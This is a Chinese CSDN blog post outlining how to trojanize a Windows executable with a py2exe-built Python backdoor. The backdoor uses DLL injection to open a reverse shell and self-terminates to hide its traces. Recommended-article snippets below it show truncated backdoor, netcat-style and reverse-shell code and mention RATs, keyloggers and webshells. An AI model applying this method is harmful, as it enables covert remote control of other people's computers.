[原]使用python建立后门

最新推荐文章于 2024-05-16 03:44:19 发布
最新推荐文章于 2024-05-16 03:44:19 发布
阅读量1.4k 收藏
点赞数
分类专栏: python喜剧
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pandarawen/article/details/8149908
版权
基本思路:
    假设:待劫持文件为A.exe;构建后门脚本为backdoor.py;注入使用的DLL为inject.dll;
    后门构建的一般思路为:重命名(或者移动)A.exe为xxx.exe,然后在backdoor中创建A.exe的进程--记为processA;然后向processA中注入DLL(学艺未精,不会写shellcode)创建一个反向连接通向服务器端;再向processA中注入代码杀死后门进程以隐藏踪轨迹;最后py2exe编译backdoor.py,将所得exe文件命名为A.exe并放到xxx.exe原来所在的目录里。
    被控端行为:当被控端想运行原来的A.exe时,会转向运行后门程序,然后后门程序再创建用户原来想要的A.exe,并在目的进程里注入dll建立一条通向服务器的shell连接,最后杀死自身以隐藏踪迹。
    由此便建立了一个由服务器到被控端的shell连接。可以使用cmd命令对被控端进行任何操作。
PandaraWen
关注
专栏目录
JSP WebSehll 后门脚本
悦分享
08-01 1322
目前很多大型厂商都选择使用Java进行Web项目的开发,近年来随着各种JAVA指定环境RCE漏洞的出现,JavaWeb的安全逐渐被人们所重视,与漏洞相关的还有用于后期维持权限的Webshell。与PHP不同的是,JSP的语言特性较为严格,属于强类型语言,并且在JDK9以前并没有所谓的eval函数。一般而言JSP的变形免杀较为困难,但是依旧存在很多的”黑魔法”。不知攻,焉知防。阿里云安骑士Webshell检测系统在迭代升级过程中,除了内部的不断绕过尝试以外,也长期邀请大量白帽子进行持续的绕过测试。...
PHP WebSehll 后门脚本与检测工具
悦分享
08-01 1417
PHP是一种动态弱类型语言,参数传递、类型转换、函数调用方式都非常灵活,这给开发者带来开发便利的同时,也给攻击者编写各种畸形恶意代码带来了很多便利,通过翻阅PHP手册
自己用python写的后门
09-01
无论是windows还是LINUX对python支持都不错,所以写了一个python后门,用起来会很方便,也很稳定
Python编写后门程序
songling515010475的专栏
05-29 1515
帮助命令: >python backDoor.py -h help info : python backDoor.py -h client : python backDoor.py -t [target] -p [port] server : python backDoor.py -lp [port] import socket import getopt import sys import sys import subprocess from threading import Thr..
python编写简单后门程序(支持windows和linux且不乱码)
热门推荐
bwlab的博客
12-04 1万+
虽然不是自己写的,但是改了两个部分,网上发的这个,quit退出功能无法使用,因为传过来的字符串其实是加了\n的,为了更人性化,我加了去空格。 第二个部分就是windows下的乱码问题,这里我先用了decode进行解码,然后encode编码传过去 这个脚本可以用计划任务1分钟执行1次,不用担心脚本重启启动问题,因为端口被占用后是无法执行成功的 ,所以不用担心。 服务段退出可以不用quit,直接
PYTHON写服务器后门
wocao___的博客
12-15 539
PYTHON写服务器后门(my_netcat.py) 不用上传后门了,服务器支持python2.7即可写入 #!/usr/bin/python import sys import socket import getopt import threading import subprocess #定义一些全局变量 listen = False command = False upload = False execute = "" target = "" upload_destination = "" port
python植入后门backdoor程序的方法?
weixin_33971130的博客
12-18 459
后门程序 from gevent.backdoor import BackdoorServer server = BackdoorServer(('127.0.0.1', 5001), banner="Hello from gevent backdoor!", locals={'foo': "From...
Oncogene:使用套接字用Python3编写的简单Windows和Linux RATBackdoor + Keylogger
04-14
使用套接字使用Python编写的简单Windows / Linux后门/ RAT + KeyLogger。 笔记 我已经在Linux环境中开发了Oncogene,它可能无法在其他系统上运行。 该后门的目标是Windows(甚至现在是Linux!),但攻击者应该使用...
python音乐下载_python 音乐下载演示源代码
weixin_39793434的博客
12-02 1232
import requestsimport reapi = 'http://music.taihe.com/search?'header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537....
详细分析PHP源代码后门事件及其供应链安全启示
smellycat000的专栏
03-30 2015
聚焦源代码安全,网罗国内外最新资讯!专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成为当今社会的根...
Python-一个隐藏的基于Python的Windows后门
08-10
一个隐藏的基于Python的Windows后门,它使用Github作为命令和控制服务器
python后门
jhui123456的博客
03-27 181
import os mystr=os.popen("tasklist") #popen与system可以执行指令,popen可以接受返回对象 mystr=mystr.read() #读取输出 #print("hello",mystr) cmdlines = os.popen("dir") f = cmdlines.read() print(f ) ...
Python黑客攻防(九)编写后门程序
qq_43681532的博客
07-16 5123
前言 本篇文章讲解如何编写后门程序,并实践测试运行,通过后门程序查找文件。 后门基本概念 防火墙用于拦截用户从外部访问服务器。访问服务器的Telnet、FTP等服务只限允许的用户使用。防火墙并不会阻断用户从内部向外部的访问路径。虽然很难从外部侵入防火墙,但一旦成功,黑客就能轻松窃取敏感信息。后门技术用于绕过防火墙等安全设备,掌控服务器资源。安装于目标服务器的后门客户端会接收并运行来自后门服务器的命令,并将运行结果发送给后门服务器。 利用后门发动攻击时,最困难的是向目标系统安装后门客户端。通过网络直接上传文件
Grok-backdoor:一款支持Ngrok隧道的强大Python后门工具
Karka_的博客
08-18 215
1、多平台支持,无需交叉编译:Linux、Windows、macOS;2、经过认证授权的Bind Shell;3、随机输出后门代码;4、Ngrok隧道支持绕过防火墙和代理限制;从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
Python后门程序编写与远程控制_python编写程序对远程主机进行操控
最新发布
2401_84141332的博客
05-16 413
Python所有方向路线就是把Python常用的技术点做整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。工欲善其事必先利其器。学习Python常用的开发软件都在这里了,给大家节省了很多时间。升级客户端和服务 源码 实现 循环交互。如果要做到远程控制对方主机。升级可以控制服务端程序。先编写一个客户端程序。
python-后门脚本编写
m0_58265086的博客
09-23 371
2.1 sql盲注脚本。
chatgpt赋能pythonPython后门:什么是后门,我们应该如何防范?
liangzijiaa的博客
05-26 339
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
(转)python正向连接后门
weixin_30828379的博客
07-03 186
python正向连接后门 PHITHON 2014 四月 12 00:12 阅读:16670 Python python,cmd后门,socket python在linux下的反弹shell代码我相信很多人都见过: import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.S...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 878
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
Python开发:pip安装与使用指南
用户在安装Python时可以选择同时安装pip,或者在已经安装的环境中,如使用virtualenv或pyvenv创建的虚拟环境,pip通常会被自动包含。 - 手动安装:如果在初始安装时未选择安装pip,可以通过下载get-pip.py脚本来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值